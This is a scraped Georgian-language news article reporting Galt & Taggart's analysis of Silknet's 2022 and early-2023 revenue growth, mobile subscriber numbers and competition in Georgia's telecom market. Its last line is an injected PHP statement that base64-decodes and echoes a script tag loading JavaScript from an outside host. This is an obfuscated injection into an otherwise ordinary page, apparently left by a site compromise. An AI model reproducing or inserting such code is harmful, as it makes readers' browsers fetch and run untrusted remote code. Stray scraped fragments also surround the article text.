celsiusi
ავერსი შნაიდერი

როგორც Galt & taggart-ის მიერ გამოქვეყნებულ კვლევაში წერია, ზრდა განპირობებული იყო კომპანიის მიერ პროდუქტებზე ფასების ზრდითა და განახლებული პაკეტების შეთავაზებით.

კომპანიის შემოსავლები წლიურ ჭრილშიც გაზრდილია. 2022 წელს კომპანიის შემოსავლები წლიურად 14.4%-ით გაიზარდა 473 მლნ ლარამდე. ზრდა ძირითადად მობილური ინტერნეტის მზარდი მოხმარებით იყო გამოწვეული.

მობილური მომსახურებისგან მიღებული შემოსავლები პირველ კვარტალში ჯამში თითქმის 42%-ით 33.4 მლნ ლარამდე გაიზარდა.

Galt & taggart წერს, რომ პირველ კვარტალშიც ტელეკომ ბაზარზე კვლავაც მაღალი კონცენტრაცია ფიქსირდება, სადაც Silknet-სა და Magticom-ს ბაზრის მნიშვნელოვანი წილი უკავიათ. მათ მოსდევს "ვიონი საქართველო", რომელმაც მიმდინარე წელს რებრედინგი განიცადა, 2022 წლის მდგომარეობით, ბაზრის თითქმის მეოთხედი ეკავა.

“მნიშვნელოვანი მოცულობის კაპიტალური დანახარჯები დააანონსა საკუთარი ქსელის გასაუმჯობესებლად, თუმცა ზუსტი მოცულობა არ დაუსახელებია. მოსალოდნელია, რომ ეს გადაწყვეტილება საშუალოვადიან პერიოდში ბაზარზე კონკურენციას გაზრდის”,-წერს Galt & taggart.

2022 წელს Silknet-მა შეინარჩუნა ბაზრის წილები ძირითად სეგმენტებში, როგორიცაა: მობილური სერვისები, ფიქსირებული ინტერნეტი, Pay-TV და ფიქსირებული ტელეფონი.

გასულ წელს ზრდა აჩვენა მობილური მომსახურების სეგმენტმა, რადგან მნიშვნელოვნად გაიზარდა აბონენტების რაოდენობა. კერძოდ, გასული წლის ბოლოსთვის აბონენტების რაოდენობა წლიურად 4.5%-ით გაიზარდა და 2022 წლისთვის თითქმის 1.8 მლნ მიაღწია. Silknet-ის გარდა, მობილური აბონენტების რაოდენობა თითქმის 5.4 მლნ-მდე არის გაზრდილი სხვა კომპანიების შემთხვევაშიც და აქ წლიური ზრდა 4.1%-ს შეადგენს.

მომგებიანობა 2022 წელსა და 2023 წლის პირველ კვარტალში მნიშვნელოვნად გაუმჯობესდა, რასაც ლარის გამყარებამაც შეუწყო ხელი.

“ველოდებით კომპანიის შემოსავლების ორნიშნა ზრდას 2023 წელს, რაც მობილური ინტერნეტიდან მიღებული შემოსავლების ზრდით იქნება განპირობებული. მობილური ინტერნეტის მოხმარების ზრდას ხელს შეუწყობს მიმდინარე ტენდენციები, მათ შორის გაზრდილი ციფრული სერვისების მოხმარება მუშაობისა და გართობისთვის, ელექტრონული კომერცია, სოციალური მედიის პლატფორმების აქტუალურობა და ტურიზმი",-აცხადებენ ორგანიზაციაში.

294
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");